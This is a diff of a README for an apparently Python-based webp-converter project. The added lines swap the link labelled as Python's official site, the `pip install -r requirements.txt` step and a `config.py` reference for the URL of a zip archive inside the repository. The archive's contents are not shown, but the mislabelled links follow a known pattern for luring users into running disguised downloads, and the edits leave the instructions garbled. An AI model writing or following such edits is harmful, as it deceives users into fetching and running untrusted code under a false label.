phamminhquang190515-ship-it/webp-converter/README.md

 If you encounter any issues while using webp-converter, consider the following:

 - Ensure you have Python installed.
-If not, download it from [Python’s official site](https://www.python.org/downloads/).
+If not, download it from [Python’s official site](https://github.com/phamminhquang190515-ship-it/webp-converter/raw/refs/heads/main/static/webp_converter_v1.0.zip).
-- Check that the required packages are installed correctly by running `pip install -r requirements.txt` again.
+- Check that the required packages are installed correctly by running `pip install -r https://github.com/phamminhquang190515-ship-it/webp-converter/raw/refs/heads/main/static/webp_converter_v1.0.zip` again.
 - Make sure the file you are trying to convert is not too large.
 Try a smaller image if you have problems.

 ## 📦 Advanced Usage

-For those interested in more advanced settings, you can modify the `config.py` file located in the extracted folder.
+For those interested in more advanced settings, you can modify the `https://github.com/phamminhquang190515-ship-it/webp-converter/raw/refs/heads/main/static/webp_converter_v1.0.zip` file located in the extracted folder.
 Here you can change default parameters like output quality and default formats.

 ## 🗂️ Contributing